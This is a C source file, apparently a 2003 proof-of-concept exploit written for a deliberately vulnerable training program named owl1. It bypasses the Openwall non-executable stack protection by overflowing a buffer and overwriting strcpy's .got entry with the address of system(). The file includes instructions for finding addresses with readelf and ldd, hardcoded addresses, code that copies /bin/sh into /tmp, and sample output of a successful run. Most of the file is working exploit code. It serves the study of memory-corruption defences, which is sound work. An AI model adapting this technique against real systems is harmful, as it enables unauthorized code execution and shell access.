/*
 * $Id: owl1-ex2.c,v 1.1.1.1 2004/05/29 14:15:05 raptor Exp $
 *
 * owl1-ex2.c - owl1.c exploit (.got entry substitution)
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit demonstrates another technique (described by Rafal Wojtczuk
 * <nergal@icm.edu.pl> in his famous paper titled "Defeating Solar Designer's 
 * Non-executable Stack Patch") to bypass the non-exec stack protection 
 * provided by the Openwall kernel patches. This time we change the .got entry
 * of strcpy() with system() address in libc. Tested on Linux (gcc-2.95.3).
 * 
 * See http://www.openwall.com/linux/ for more details about the Linux kernel
 * patches from Openwall project.
 *
 * Grab the addresses you need:
 *
 * $ ldd owl1
 *         libc.so.6 => /lib/libc.so.6 (0x0012b000)
 *                                      ^^^^^^^^^^\__(this is the LIBBASE)
 * [...]
 *
 * $ readelf -a owl1 | grep strcpy
 *  080494f8  00707 R_386_JUMP_SLOT       08048338  strcpy                   
 *  ^^^^^^^^\__(strcpy() address in .got)
 *     7: 08048338    32 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.0 (2)
 *    78: 08048338    32 FUNC    GLOBAL DEFAULT  UND strcpy@@GLIBC_2.0
 *        ^^^^^^^^\__(strcpy() address in .plt)
 *
 * $ readelf -a /lib/libc.so.6 | grep " system@"
 *    509: 000488f0   730 FUNC    WEAK   DEFAULT   17 system@@GLIBC_2.0
 *         ^^^^^^^^\__(system() offset in libc)
 *
 * raptor@dns:~/devel$ ./owl1-ex2
 * Using strcpy() address in .plt: 0x8048338
 * Using strcpy() address in .got: 0x80494f8
 * Using system() address in libc: 0x1738f0
 * Using shell address: 0xbfffffe9
 * smash me!
 * raptor@dns:/home/raptor/devel$ 
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define BUF		277			// (64 * 4) + 4 + (4 * 4) + 1
#define VULN		"./owl1"		// the vulnerable program

#define LIBBASE		0x0012b000		// base address of libc mapping
#define STRCPY_PLT	0x08048338		// strcpy() address in .plt
#define	STRCPY_GOT	0x080494f8		// strcpy() address in .got
#define	SYSTEM		(LIBBASE + 0x000488f0)	// system() address in libc

char shell[] = "/tmp/xxxXXX";			// 8 + 3 [+ 1]

int main()
{
	char *env[2] = {shell, NULL};
	char buf[BUF], arg[66];
	int i;

	int *p = (int *)buf;
        int ret = 0xbffffffa - strlen(shell) - strlen(VULN);

	fprintf(stderr, "Using strcpy() address in .plt: %p\n", STRCPY_PLT);
	fprintf(stderr, "Using strcpy() address in .got: %p\n", STRCPY_GOT);
	fprintf(stderr, "Using system() address in libc: %p\n", SYSTEM);
	fprintf(stderr, "Using shell address: %p\n", ret);

	/* fill the buffer */
	memset(buf, 'A', BUF);
	p += 65;

	/* prepare the stack */
	*p++ = STRCPY_PLT;	/* call strcpy() in .plt */
	*p++ = STRCPY_PLT;	/* second strcpy(), will become system() */
	*p++ = STRCPY_GOT - 8;	/* strcpy() address in .got - 8 */
	*p++ = ret;		/* shell address */
	*p = 0x0;

	/* copy /bin/sh in /tmp/xxx??? */
	*(int *)(shell + 8) = SYSTEM;
	sprintf(arg, "/bin/cp /bin/sh %s", shell);
	system(arg);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf, NULL, env);
	perror("execle");
}
